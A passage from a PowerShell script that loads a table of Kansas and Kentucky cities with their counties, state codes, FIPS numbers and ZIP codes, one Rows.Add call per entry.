$Cities.Rows.Add("Derby","Sedgwick","Kansas","KS","20","67037") + $null = $Cities.Rows.Add("Dexter","Cowley","Kansas","KS","20","67038") + $null = $Cities.Rows.Add("Douglass","Butler","Kansas","KS","20","67039") + $null = $Cities.Rows.Add("Elbing","Butler","Kansas","KS","20","67041") + $null = $Cities.Rows.Add("El dorado","Butler","Kansas","KS","20","67042") + $null = $Cities.Rows.Add("Eureka","Greenwood","Kansas","KS","20","67045") + $null = $Cities.Rows.Add("Fall river","Greenwood","Kansas","KS","20","67047") + $null = $Cities.Rows.Add("Freeport","Harper","Kansas","KS","20","67049") + $null = $Cities.Rows.Add("Garden plain","Sedgwick","Kansas","KS","20","67050") + $null = $Cities.Rows.Add("Geuda springs","Sumner","Kansas","KS","20","67051") + $null = $Cities.Rows.Add("Goddard","Sedgwick","Kansas","KS","20","67052") + $null = $Cities.Rows.Add("Goessel","Marion","Kansas","KS","20","67053") + $null = $Cities.Rows.Add("Greensburg","Kiowa","Kansas","KS","20","67054") + $null = $Cities.Rows.Add("Halstead","Harvey","Kansas","KS","20","67056") + $null = $Cities.Rows.Add("Hardtner","Barber","Kansas","KS","20","67057") + $null = $Cities.Rows.Add("Harper","Harper","Kansas","KS","20","67058") + $null = $Cities.Rows.Add("Haviland","Kiowa","Kansas","KS","20","67059") + $null = $Cities.Rows.Add("Haysville","Sedgwick","Kansas","KS","20","67060") + $null = $Cities.Rows.Add("Hazelton","Barber","Kansas","KS","20","67061") + $null = $Cities.Rows.Add("Hesston","Harvey","Kansas","KS","20","67062") + $null = $Cities.Rows.Add("Hillsboro","Marion","Kansas","KS","20","67063") + $null = $Cities.Rows.Add("Isabel","Barber","Kansas","KS","20","67065") + $null = $Cities.Rows.Add("Iuka","Pratt","Kansas","KS","20","67066") + $null = $Cities.Rows.Add("Kechi","Sedgwick","Kansas","KS","20","67067") + $null = $Cities.Rows.Add("Belmont","Kingman","Kansas","KS","20","67068") + $null = $Cities.Rows.Add("Kiowa","Barber","Kansas","KS","20","67070") + $null = $Cities.Rows.Add("Lake city","Barber","Kansas","KS","20","67071") + $null = $Cities.Rows.Add("Latham","Butler","Kansas","KS","20","67072") + $null = $Cities.Rows.Add("Lehigh","Marion","Kansas","KS","20","67073") + $null = $Cities.Rows.Add("Leon","Butler","Kansas","KS","20","67074") + $null = $Cities.Rows.Add("Zcta 670hh","Butler","Kansas","KS","20","670HH") + $null = $Cities.Rows.Add("Zcta 670xx","Cowley","Kansas","KS","20","670XX") + $null = $Cities.Rows.Add("Maize","Sedgwick","Kansas","KS","20","67101") + $null = $Cities.Rows.Add("Maple city","Cowley","Kansas","KS","20","67102") + $null = $Cities.Rows.Add("Mayfield","Sumner","Kansas","KS","20","67103") + $null = $Cities.Rows.Add("Medicine lodge","Barber","Kansas","KS","20","67104") + $null = $Cities.Rows.Add("Milan","Sumner","Kansas","KS","20","67105") + $null = $Cities.Rows.Add("Milton","Sumner","Kansas","KS","20","67106") + $null = $Cities.Rows.Add("Moundridge","McPherson","Kansas","KS","20","67107") + $null = $Cities.Rows.Add("Mount hope","Sedgwick","Kansas","KS","20","67108") + $null = $Cities.Rows.Add("Mullinville","Kiowa","Kansas","KS","20","67109") + $null = $Cities.Rows.Add("Mulvane","Sedgwick","Kansas","KS","20","67110") + $null = $Cities.Rows.Add("Murdock","Kingman","Kansas","KS","20","67111") + $null = $Cities.Rows.Add("Nashville","Kingman","Kansas","KS","20","67112") + $null = $Cities.Rows.Add("Newton","Harvey","Kansas","KS","20","67114") + $null = $Cities.Rows.Add("North newton","Harvey","Kansas","KS","20","67117") + $null = $Cities.Rows.Add("Norwich","Kingman","Kansas","KS","20","67118") + $null = $Cities.Rows.Add("Oxford","Sumner","Kansas","KS","20","67119") + $null = $Cities.Rows.Add("Peck","Sumner","Kansas","KS","20","67120") + $null = $Cities.Rows.Add("Piedmont","Greenwood","Kansas","KS","20","67122") + $null = $Cities.Rows.Add("Potwin","Butler","Kansas","KS","20","67123") + $null = $Cities.Rows.Add("Pratt","Pratt","Kansas","KS","20","67124") + $null = $Cities.Rows.Add("Protection","Comanche","Kansas","KS","20","67127") + $null = $Cities.Rows.Add("Rago","Kingman","Kansas","KS","20","67128") + $null = $Cities.Rows.Add("Rock","Cowley","Kansas","KS","20","67131") + $null = $Cities.Rows.Add("Rosalia","Butler","Kansas","KS","20","67132") + $null = $Cities.Rows.Add("Rose hill","Butler","Kansas","KS","20","67133") + $null = $Cities.Rows.Add("Sawyer","Pratt","Kansas","KS","20","67134") + $null = $Cities.Rows.Add("Sedgwick","Harvey","Kansas","KS","20","67135") + $null = $Cities.Rows.Add("Climax","Greenwood","Kansas","KS","20","67137") + $null = $Cities.Rows.Add("Sharon","Barber","Kansas","KS","20","67138") + $null = $Cities.Rows.Add("South haven","Sumner","Kansas","KS","20","67140") + $null = $Cities.Rows.Add("Spivey","Kingman","Kansas","KS","20","67142") + $null = $Cities.Rows.Add("Sun city","Barber","Kansas","KS","20","67143") + $null = $Cities.Rows.Add("Towanda","Butler","Kansas","KS","20","67144") + $null = $Cities.Rows.Add("Udall","Cowley","Kansas","KS","20","67146") + $null = $Cities.Rows.Add("Valley center","Sedgwick","Kansas","KS","20","67147") + $null = $Cities.Rows.Add("Viola","Sedgwick","Kansas","KS","20","67149") + $null = $Cities.Rows.Add("Waldron","Harper","Kansas","KS","20","67150") + $null = $Cities.Rows.Add("Walton","Harvey","Kansas","KS","20","67151") + $null = $Cities.Rows.Add("Wellington","Sumner","Kansas","KS","20","67152") + $null = $Cities.Rows.Add("Whitewater","Butler","Kansas","KS","20","67154") + $null = $Cities.Rows.Add("Wilmore","Comanche","Kansas","KS","20","67155") + $null = $Cities.Rows.Add("Winfield","Cowley","Kansas","KS","20","67156") + $null = $Cities.Rows.Add("Zenda","Kingman","Kansas","KS","20","67159") + $null = $Cities.Rows.Add("Zcta 671hh","Comanche","Kansas","KS","20","671HH") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67202") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67203") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67204") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67205") + $null = $Cities.Rows.Add("Eastborough","Sedgwick","Kansas","KS","20","67206") + $null = $Cities.Rows.Add("Eastborough","Sedgwick","Kansas","KS","20","67207") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67208") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67209") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67210") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67211") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67212") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67213") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67214") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67215") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67216") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67217") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67218") + $null = $Cities.Rows.Add("Park city","Sedgwick","Kansas","KS","20","67219") + $null = $Cities.Rows.Add("Bel aire","Sedgwick","Kansas","KS","20","67220") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67226") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67230") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67233") + $null = $Cities.Rows.Add("Wichita","Sedgwick","Kansas","KS","20","67235") + $null = $Cities.Rows.Add("Zcta 672hh","Sedgwick","Kansas","KS","20","672HH") + $null = $Cities.Rows.Add("Independence","Montgomery","Kansas","KS","20","67301") + $null = $Cities.Rows.Add("Altamont","Labette","Kansas","KS","20","67330") + $null = $Cities.Rows.Add("Bartlett","Labette","Kansas","KS","20","67332") + $null = $Cities.Rows.Add("Caney","Montgomery","Kansas","KS","20","67333") + $null = $Cities.Rows.Add("Chautauqua","Chautauqua","Kansas","KS","20","67334") + $null = $Cities.Rows.Add("Cherryvale","Montgomery","Kansas","KS","20","67335") + $null = $Cities.Rows.Add("Chetopa","Labette","Kansas","KS","20","67336") + $null = $Cities.Rows.Add("Coffeyville","Montgomery","Kansas","KS","20","67337") + $null = $Cities.Rows.Add("Dearing","Montgomery","Kansas","KS","20","67340") + $null = $Cities.Rows.Add("Dennis","Labette","Kansas","KS","20","67341") + $null = $Cities.Rows.Add("Edna","Labette","Kansas","KS","20","67342") + $null = $Cities.Rows.Add("Elk city","Montgomery","Kansas","KS","20","67344") + $null = $Cities.Rows.Add("Elk falls","Elk","Kansas","KS","20","67345") + $null = $Cities.Rows.Add("Grenola","Elk","Kansas","KS","20","67346") + $null = $Cities.Rows.Add("Havana","Montgomery","Kansas","KS","20","67347") + $null = $Cities.Rows.Add("Howard","Elk","Kansas","KS","20","67349") + $null = $Cities.Rows.Add("Liberty","Montgomery","Kansas","KS","20","67351") + $null = $Cities.Rows.Add("Longton","Elk","Kansas","KS","20","67352") + $null = $Cities.Rows.Add("Moline","Elk","Kansas","KS","20","67353") + $null = $Cities.Rows.Add("Mound valley","Labette","Kansas","KS","20","67354") + $null = $Cities.Rows.Add("Niotaze","Chautauqua","Kansas","KS","20","67355") + $null = $Cities.Rows.Add("Oswego","Labette","Kansas","KS","20","67356") + $null = $Cities.Rows.Add("Parsons","Labette","Kansas","KS","20","67357") + $null = $Cities.Rows.Add("Peru","Chautauqua","Kansas","KS","20","67360") + $null = $Cities.Rows.Add("Sedan","Chautauqua","Kansas","KS","20","67361") + $null = $Cities.Rows.Add("Sycamore","Montgomery","Kansas","KS","20","67363") + $null = $Cities.Rows.Add("Tyro","Montgomery","Kansas","KS","20","67364") + $null = $Cities.Rows.Add("Zcta 673hh","Chautauqua","Kansas","KS","20","673HH") + $null = $Cities.Rows.Add("Zcta 673xx","Elk","Kansas","KS","20","673XX") + $null = $Cities.Rows.Add("Bavaria","Saline","Kansas","KS","20","67401") + $null = $Cities.Rows.Add("Abilene","Dickinson","Kansas","KS","20","67410") + $null = $Cities.Rows.Add("Assaria","Saline","Kansas","KS","20","67416") + $null = $Cities.Rows.Add("Aurora","Cloud","Kansas","KS","20","67417") + $null = $Cities.Rows.Add("Barnard","Lincoln","Kansas","KS","20","67418") + $null = $Cities.Rows.Add("Scottsville","Mitchell","Kansas","KS","20","67420") + $null = $Cities.Rows.Add("Bennington","Ottawa","Kansas","KS","20","67422") + $null = $Cities.Rows.Add("Beverly","Lincoln","Kansas","KS","20","67423") + $null = $Cities.Rows.Add("Brookville","Saline","Kansas","KS","20","67425") + $null = $Cities.Rows.Add("Bushton","Rice","Kansas","KS","20","67427") + $null = $Cities.Rows.Add("Canton","McPherson","Kansas","KS","20","67428") + $null = $Cities.Rows.Add("Cawker city","Mitchell","Kansas","KS","20","67430") + $null = $Cities.Rows.Add("Chapman","Dickinson","Kansas","KS","20","67431") + $null = $Cities.Rows.Add("Clay center","Clay","Kansas","KS","20","67432") + $null = $Cities.Rows.Add("Delphos","Ottawa","Kansas","KS","20","67436") + $null = $Cities.Rows.Add("Downs","Osborne","Kansas","KS","20","67437") + $null = $Cities.Rows.Add("Durham","Marion","Kansas","KS","20","67438") + $null = $Cities.Rows.Add("Ellsworth","Ellsworth","Kansas","KS","20","67439") + $null = $Cities.Rows.Add("Enterprise","Dickinson","Kansas","KS","20","67441") + $null = $Cities.Rows.Add("Falun","Saline","Kansas","KS","20","67442") + $null = $Cities.Rows.Add("Galva","McPherson","Kansas","KS","20","67443") + $null = $Cities.Rows.Add("Geneseo","Rice","Kansas","KS","20","67444") + $null = $Cities.Rows.Add("Glasco","Cloud","Kansas","KS","20","67445") + $null = $Cities.Rows.Add("Glen elder","Mitchell","Kansas","KS","20","67446") + $null = $Cities.Rows.Add("Green","Clay","Kansas","KS","20","67447") + $null = $Cities.Rows.Add("Gypsum","Saline","Kansas","KS","20","67448") + $null = $Cities.Rows.Add("Delavan","Dickinson","Kansas","KS","20","67449") + $null = $Cities.Rows.Add("Holyrood","Ellsworth","Kansas","KS","20","67450") + $null = $Cities.Rows.Add("Hope","Dickinson","Kansas","KS","20","67451") + $null = $Cities.Rows.Add("Hunter","Mitchell","Kansas","KS","20","67452") + $null = $Cities.Rows.Add("Kanopolis","Ellsworth","Kansas","KS","20","67454") + $null = $Cities.Rows.Add("Westfall","Lincoln","Kansas","KS","20","67455") + $null = $Cities.Rows.Add("Lindsborg","McPherson","Kansas","KS","20","67456") + $null = $Cities.Rows.Add("Little river","Rice","Kansas","KS","20","67457") + $null = $Cities.Rows.Add("Longford","Clay","Kansas","KS","20","67458") + $null = $Cities.Rows.Add("Lorraine","Ellsworth","Kansas","KS","20","67459") + $null = $Cities.Rows.Add("Conway","McPherson","Kansas","KS","20","67460") + $null = $Cities.Rows.Add("Marquette","McPherson","Kansas","KS","20","67464") + $null = $Cities.Rows.Add("Miltonvale","Cloud","Kansas","KS","20","67466") + $null = $Cities.Rows.Add("Minneapolis","Ottawa","Kansas","KS","20","67467") + $null = $Cities.Rows.Add("Morganville","Clay","Kansas","KS","20","67468") + $null = $Cities.Rows.Add("New cambria","Saline","Kansas","KS","20","67470") + $null = $Cities.Rows.Add("Osborne","Osborne","Kansas","KS","20","67473") + $null = $Cities.Rows.Add("Portis","Osborne","Kansas","KS","20","67474") + $null = $Cities.Rows.Add("Ramona","Marion","Kansas","KS","20","67475") + $null = $Cities.Rows.Add("Simpson","Mitchell","Kansas","KS","20","67478") + $null = $Cities.Rows.Add("Solomon","Dickinson","Kansas","KS","20","67480") + $null = $Cities.Rows.Add("Sylvan grove","Lincoln","Kansas","KS","20","67481") + $null = $Cities.Rows.Add("Talmage","Dickinson","Kansas","KS","20","67482") + $null = $Cities.Rows.Add("Tampa","Marion","Kansas","KS","20","67483") + $null = $Cities.Rows.Add("Culver","Ottawa","Kansas","KS","20","67484") + $null = $Cities.Rows.Add("Tipton","Mitchell","Kansas","KS","20","67485") + $null = $Cities.Rows.Add("Wakefield","Clay","Kansas","KS","20","67487") + $null = $Cities.Rows.Add("Wilson","Ellsworth","Kansas","KS","20","67490") + $null = $Cities.Rows.Add("Windom","McPherson","Kansas","KS","20","67491") + $null = $Cities.Rows.Add("Woodbine","Dickinson","Kansas","KS","20","67492") + $null = $Cities.Rows.Add("Zcta 674hh","Clay","Kansas","KS","20","674HH") + $null = $Cities.Rows.Add("Zcta 674xx","Saline","Kansas","KS","20","674XX") + $null = $Cities.Rows.Add("Hutchinson","Reno","Kansas","KS","20","67501") + $null = $Cities.Rows.Add("Medora","Reno","Kansas","KS","20","67502") + $null = $Cities.Rows.Add("South hutchinson","Reno","Kansas","KS","20","67505") + $null = $Cities.Rows.Add("Abbyville","Reno","Kansas","KS","20","67510") + $null = $Cities.Rows.Add("Albert","Barton","Kansas","KS","20","67511") + $null = $Cities.Rows.Add("Alden","Rice","Kansas","KS","20","67512") + $null = $Cities.Rows.Add("Alexander","Rush","Kansas","KS","20","67513") + $null = $Cities.Rows.Add("Arlington","Reno","Kansas","KS","20","67514") + $null = $Cities.Rows.Add("Arnold","Ness","Kansas","KS","20","67515") + $null = $Cities.Rows.Add("Bazine","Ness","Kansas","KS","20","67516") + $null = $Cities.Rows.Add("Beeler","Ness","Kansas","KS","20","67518") + $null = $Cities.Rows.Add("Belpre","Edwards","Kansas","KS","20","67519") + $null = $Cities.Rows.Add("Bison","Rush","Kansas","KS","20","67520") + $null = $Cities.Rows.Add("Brownell","Ness","Kansas","KS","20","67521") + $null = $Cities.Rows.Add("Buhler","Reno","Kansas","KS","20","67522") + $null = $Cities.Rows.Add("Burdett","Pawnee","Kansas","KS","20","67523") + $null = $Cities.Rows.Add("Chase","Rice","Kansas","KS","20","67524") + $null = $Cities.Rows.Add("Claflin","Barton","Kansas","KS","20","67525") + $null = $Cities.Rows.Add("Ellinwood","Barton","Kansas","KS","20","67526") + $null = $Cities.Rows.Add("Garfield","Pawnee","Kansas","KS","20","67529") + $null = $Cities.Rows.Add("Heizer","Barton","Kansas","KS","20","67530") + $null = $Cities.Rows.Add("Haven","Reno","Kansas","KS","20","67543") + $null = $Cities.Rows.Add("Susank","Barton","Kansas","KS","20","67544") + $null = $Cities.Rows.Add("Hudson","Stafford","Kansas","KS","20","67545") + $null = $Cities.Rows.Add("Inman","McPherson","Kansas","KS","20","67546") + $null = $Cities.Rows.Add("Kinsley","Edwards","Kansas","KS","20","67547") + $null = $Cities.Rows.Add("La crosse","Rush","Kansas","KS","20","67548") + $null = $Cities.Rows.Add("Radium","Pawnee","Kansas","KS","20","67550") + $null = $Cities.Rows.Add("Lewis","Edwards","Kansas","KS","20","67552") + $null = $Cities.Rows.Add("Liebenthal","Rush","Kansas","KS","20","67553") + $null = $Cities.Rows.Add("Lyons","Rice","Kansas","KS","20","67554") + $null = $Cities.Rows.Add("Mc cracken","Rush","Kansas","KS","20","67556") + $null = $Cities.Rows.Add("Macksville","Stafford","Kansas","KS","20","67557") + $null = $Cities.Rows.Add("Nekoma","Rush","Kansas","KS","20","67559") + $null = $Cities.Rows.Add("Ness city","Ness","Kansas","KS","20","67560") + $null = $Cities.Rows.Add("Nickerson","Reno","Kansas","KS","20","67561") + $null = $Cities.Rows.Add("Offerle","Edwards","Kansas","KS","20","67563") + $null = $Cities.Rows.Add("Galatia","Barton","Kansas","KS","20","67564") + $null = $Cities.Rows.Add("Galatia","Rush","Kansas","KS","20","67565") + $null = $Cities.Rows.Add("Partridge","Reno","Kansas","KS","20","67566") + $null = $Cities.Rows.Add("Pawnee rock","Barton","Kansas","KS","20","67567") + $null = $Cities.Rows.Add("Plevna","Reno","Kansas","KS","20","67568") + $null = $Cities.Rows.Add("Pretty prairie","Reno","Kansas","KS","20","67570") + $null = $Cities.Rows.Add("Ransom","Ness","Kansas","KS","20","67572") + $null = $Cities.Rows.Add("Raymond","Rice","Kansas","KS","20","67573") + $null = $Cities.Rows.Add("Rozel","Pawnee","Kansas","KS","20","67574") + $null = $Cities.Rows.Add("Rush center","Rush","Kansas","KS","20","67575") + $null = $Cities.Rows.Add("Saint john","Stafford","Kansas","KS","20","67576") + $null = $Cities.Rows.Add("Stafford","Stafford","Kansas","KS","20","67578") + $null = $Cities.Rows.Add("Sterling","Rice","Kansas","KS","20","67579") + $null = $Cities.Rows.Add("Sylvia","Reno","Kansas","KS","20","67581") + $null = $Cities.Rows.Add("Langdon","Reno","Kansas","KS","20","67583") + $null = $Cities.Rows.Add("Utica","Ness","Kansas","KS","20","67584") + $null = $Cities.Rows.Add("Zcta 675hh","Barton","Kansas","KS","20","675HH") + $null = $Cities.Rows.Add("Zcta 675xx","Stafford","Kansas","KS","20","675XX") + $null = $Cities.Rows.Add("Antonino","Ellis","Kansas","KS","20","67601") + $null = $Cities.Rows.Add("Agra","Phillips","Kansas","KS","20","67621") + $null = $Cities.Rows.Add("Almena","Norton","Kansas","KS","20","67622") + $null = $Cities.Rows.Add("Alton","Osborne","Kansas","KS","20","67623") + $null = $Cities.Rows.Add("Bogue","Graham","Kansas","KS","20","67625") + $null = $Cities.Rows.Add("Bunker hill","Russell","Kansas","KS","20","67626") + $null = $Cities.Rows.Add("Cedar","Smith","Kansas","KS","20","67628") + $null = $Cities.Rows.Add("Clayton","Norton","Kansas","KS","20","67629") + $null = $Cities.Rows.Add("Collyer","Trego","Kansas","KS","20","67631") + $null = $Cities.Rows.Add("Damar","Rooks","Kansas","KS","20","67632") + $null = $Cities.Rows.Add("Dorrance","Russell","Kansas","KS","20","67634") + $null = $Cities.Rows.Add("Dresden","Decatur","Kansas","KS","20","67635") + $null = $Cities.Rows.Add("Ellis","Ellis","Kansas","KS","20","67637") + $null = $Cities.Rows.Add("Gaylord","Smith","Kansas","KS","20","67638") + $null = $Cities.Rows.Add("Glade","Phillips","Kansas","KS","20","67639") + $null = $Cities.Rows.Add("Gorham","Russell","Kansas","KS","20","67640") + $null = $Cities.Rows.Add("Hill city","Graham","Kansas","KS","20","67642") + $null = $Cities.Rows.Add("Jennings","Decatur","Kansas","KS","20","67643") + $null = $Cities.Rows.Add("Kirwin","Phillips","Kansas","KS","20","67644") + $null = $Cities.Rows.Add("Densmore","Norton","Kansas","KS","20","67645") + $null = $Cities.Rows.Add("Logan","Phillips","Kansas","KS","20","67646") + $null = $Cities.Rows.Add("Long island","Phillips","Kansas","KS","20","67647") + $null = $Cities.Rows.Add("Lucas","Russell","Kansas","KS","20","67648") + $null = $Cities.Rows.Add("Luray","Russell","Kansas","KS","20","67649") + $null = $Cities.Rows.Add("Morland","Graham","Kansas","KS","20","67650") + $null = $Cities.Rows.Add("Natoma","Osborne","Kansas","KS","20","67651") + $null = $Cities.Rows.Add("Norcatur","Decatur","Kansas","KS","20","67653") + $null = $Cities.Rows.Add("Norton","Norton","Kansas","KS","20","67654") + $null = $Cities.Rows.Add("Ogallah","Trego","Kansas","KS","20","67656") + $null = $Cities.Rows.Add("Palco","Rooks","Kansas","KS","20","67657") + $null = $Cities.Rows.Add("Paradise","Russell","Kansas","KS","20","67658") + $null = $Cities.Rows.Add("Penokee","Graham","Kansas","KS","20","67659") + $null = $Cities.Rows.Add("Pfeifer","Ellis","Kansas","KS","20","67660") + $null = $Cities.Rows.Add("Phillipsburg","Phillips","Kansas","KS","20","67661") + $null = $Cities.Rows.Add("Plainville","Rooks","Kansas","KS","20","67663") + $null = $Cities.Rows.Add("Prairie view","Phillips","Kansas","KS","20","67664") + $null = $Cities.Rows.Add("Russell","Russell","Kansas","KS","20","67665") + $null = $Cities.Rows.Add("Schoenchen","Ellis","Kansas","KS","20","67667") + $null = $Cities.Rows.Add("Stockton","Rooks","Kansas","KS","20","67669") + $null = $Cities.Rows.Add("Stuttgart","Phillips","Kansas","KS","20","67670") + $null = $Cities.Rows.Add("Victoria","Ellis","Kansas","KS","20","67671") + $null = $Cities.Rows.Add("Wa keeney","Trego","Kansas","KS","20","67672") + $null = $Cities.Rows.Add("Waldo","Russell","Kansas","KS","20","67673") + $null = $Cities.Rows.Add("Walker","Ellis","Kansas","KS","20","67674") + $null = $Cities.Rows.Add("Woodston","Rooks","Kansas","KS","20","67675") + $null = $Cities.Rows.Add("Zcta 676hh","Phillips","Kansas","KS","20","676HH") + $null = $Cities.Rows.Add("Zcta 676xx","Rooks","Kansas","KS","20","676XX") + $null = $Cities.Rows.Add("Colby","Thomas","Kansas","KS","20","67701") + $null = $Cities.Rows.Add("Atwood","Rawlins","Kansas","KS","20","67730") + $null = $Cities.Rows.Add("Bird city","Cheyenne","Kansas","KS","20","67731") + $null = $Cities.Rows.Add("Brewster","Thomas","Kansas","KS","20","67732") + $null = $Cities.Rows.Add("Edson","Sherman","Kansas","KS","20","67733") + $null = $Cities.Rows.Add("Gem","Thomas","Kansas","KS","20","67734") + $null = $Cities.Rows.Add("Goodland","Sherman","Kansas","KS","20","67735") + $null = $Cities.Rows.Add("Gove","Gove","Kansas","KS","20","67736") + $null = $Cities.Rows.Add("Grainfield","Gove","Kansas","KS","20","67737") + $null = $Cities.Rows.Add("Grinnell","Gove","Kansas","KS","20","67738") + $null = $Cities.Rows.Add("Herndon","Rawlins","Kansas","KS","20","67739") + $null = $Cities.Rows.Add("Hoxie","Sheridan","Kansas","KS","20","67740") + $null = $Cities.Rows.Add("Kanorado","Sherman","Kansas","KS","20","67741") + $null = $Cities.Rows.Add("Levant","Thomas","Kansas","KS","20","67743") + $null = $Cities.Rows.Add("Ludell","Rawlins","Kansas","KS","20","67744") + $null = $Cities.Rows.Add("Mc donald","Rawlins","Kansas","KS","20","67745") + $null = $Cities.Rows.Add("Monument","Logan","Kansas","KS","20","67747") + $null = $Cities.Rows.Add("Oakley","Logan","Kansas","KS","20","67748") + $null = $Cities.Rows.Add("Oberlin","Decatur","Kansas","KS","20","67749") + $null = $Cities.Rows.Add("Park","Gove","Kansas","KS","20","67751") + $null = $Cities.Rows.Add("Quinter","Gove","Kansas","KS","20","67752") + $null = $Cities.Rows.Add("Menlo","Thomas","Kansas","KS","20","67753") + $null = $Cities.Rows.Add("Wheeler","Cheyenne","Kansas","KS","20","67756") + $null = $Cities.Rows.Add("Selden","Sheridan","Kansas","KS","20","67757") + $null = $Cities.Rows.Add("Sharon springs","Wallace","Kansas","KS","20","67758") + $null = $Cities.Rows.Add("Wallace","Wallace","Kansas","KS","20","67761") + $null = $Cities.Rows.Add("Weskan","Wallace","Kansas","KS","20","67762") + $null = $Cities.Rows.Add("Winona","Logan","Kansas","KS","20","67764") + $null = $Cities.Rows.Add("Zcta 677hh","Cheyenne","Kansas","KS","20","677HH") + $null = $Cities.Rows.Add("Zcta 677xx","Thomas","Kansas","KS","20","677XX") + $null = $Cities.Rows.Add("Dodge city","Ford","Kansas","KS","20","67801") + $null = $Cities.Rows.Add("Ashland","Clark","Kansas","KS","20","67831") + $null = $Cities.Rows.Add("Bucklin","Ford","Kansas","KS","20","67834") + $null = $Cities.Rows.Add("Cimarron","Gray","Kansas","KS","20","67835") + $null = $Cities.Rows.Add("Coolidge","Hamilton","Kansas","KS","20","67836") + $null = $Cities.Rows.Add("Copeland","Gray","Kansas","KS","20","67837") + $null = $Cities.Rows.Add("Deerfield","Kearny","Kansas","KS","20","67838") + $null = $Cities.Rows.Add("Alamota","Lane","Kansas","KS","20","67839") + $null = $Cities.Rows.Add("Englewood","Clark","Kansas","KS","20","67840") + $null = $Cities.Rows.Add("Ensign","Gray","Kansas","KS","20","67841") + $null = $Cities.Rows.Add("Ford","Ford","Kansas","KS","20","67842") + $null = $Cities.Rows.Add("Fowler","Meade","Kansas","KS","20","67844") + $null = $Cities.Rows.Add("Garden city","Finney","Kansas","KS","20","67846") + $null = $Cities.Rows.Add("Hanston","Hodgeman","Kansas","KS","20","67849") + $null = $Cities.Rows.Add("Healy","Lane","Kansas","KS","20","67850") + $null = $Cities.Rows.Add("Holcomb","Finney","Kansas","KS","20","67851") + $null = $Cities.Rows.Add("Ingalls","Gray","Kansas","KS","20","67853") + $null = $Cities.Rows.Add("Jetmore","Hodgeman","Kansas","KS","20","67854") + $null = $Cities.Rows.Add("Johnson","Stanton","Kansas","KS","20","67855") + $null = $Cities.Rows.Add("Kendall","Hamilton","Kansas","KS","20","67857") + $null = $Cities.Rows.Add("Kismet","Seward","Kansas","KS","20","67859") + $null = $Cities.Rows.Add("Lakin","Kearny","Kansas","KS","20","67860") + $null = $Cities.Rows.Add("Leoti","Wichita","Kansas","KS","20","67861") + $null = $Cities.Rows.Add("Manter","Stanton","Kansas","KS","20","67862") + $null = $Cities.Rows.Add("Modoc","Wichita","Kansas","KS","20","67863") + $null = $Cities.Rows.Add("Meade","Meade","Kansas","KS","20","67864") + $null = $Cities.Rows.Add("Bloom","Clark","Kansas","KS","20","67865") + $null = $Cities.Rows.Add("Montezuma","Gray","Kansas","KS","20","67867") + $null = $Cities.Rows.Add("Pierceville","Finney","Kansas","KS","20","67868") + $null = $Cities.Rows.Add("Plains","Meade","Kansas","KS","20","67869") + $null = $Cities.Rows.Add("Satanta","Haskell","Kansas","KS","20","67870") + $null = $Cities.Rows.Add("Friend","Scott","Kansas","KS","20","67871") + $null = $Cities.Rows.Add("Spearville","Ford","Kansas","KS","20","67876") + $null = $Cities.Rows.Add("Sublette","Haskell","Kansas","KS","20","67877") + $null = $Cities.Rows.Add("Syracuse","Hamilton","Kansas","KS","20","67878") + $null = $Cities.Rows.Add("Tribune","Greeley","Kansas","KS","20","67879") + $null = $Cities.Rows.Add("Ulysses","Grant","Kansas","KS","20","67880") + $null = $Cities.Rows.Add("Wright","Ford","Kansas","KS","20","67882") + $null = $Cities.Rows.Add("Zcta 678hh","Clark","Kansas","KS","20","678HH") + $null = $Cities.Rows.Add("Zcta 678xx","Greeley","Kansas","KS","20","678XX") + $null = $Cities.Rows.Add("Liberal","Seward","Kansas","KS","20","67901") + $null = $Cities.Rows.Add("Elkhart","Morton","Kansas","KS","20","67950") + $null = $Cities.Rows.Add("Hugoton","Stevens","Kansas","KS","20","67951") + $null = $Cities.Rows.Add("Moscow","Stevens","Kansas","KS","20","67952") + $null = $Cities.Rows.Add("Richfield","Morton","Kansas","KS","20","67953") + $null = $Cities.Rows.Add("Rolla","Morton","Kansas","KS","20","67954") + $null = $Cities.Rows.Add("Zcta 679xx","Morton","Kansas","KS","20","679XX") + $null = $Cities.Rows.Add("","Fulton","Kentucky","KY","21","38079") + $null = $Cities.Rows.Add("","Fulton","Kentucky","KY","21","380HH") + $null = $Cities.Rows.Add("Bagdad","Shelby","Kentucky","KY","21","40003") + $null = $Cities.Rows.Add("Bardstown","Nelson","Kentucky","KY","21","40004") + $null = $Cities.Rows.Add("Bedford","Trimble","Kentucky","KY","21","40006") + $null = $Cities.Rows.Add("Bethlehem","Henry","Kentucky","KY","21","40007") + $null = $Cities.Rows.Add("Bloomfield","Nelson","Kentucky","KY","21","40008") + $null = $Cities.Rows.Add("Bradfordsville","Marion","Kentucky","KY","21","40009") + $null = $Cities.Rows.Add("Buckner","Oldham","Kentucky","KY","21","40010") + $null = $Cities.Rows.Add("Campbellsburg","Henry","Kentucky","KY","21","40011") + $null = $Cities.Rows.Add("Chaplin","Nelson","Kentucky","KY","21","40012") + $null = $Cities.Rows.Add("Deatsville","Nelson","Kentucky","KY","21","40013") + $null = $Cities.Rows.Add("Crestwood","Oldham","Kentucky","KY","21","40014") + $null = $Cities.Rows.Add("Eminence","Henry","Kentucky","KY","21","40019") + $null = $Cities.Rows.Add("Fairfield","Nelson","Kentucky","KY","21","40020") 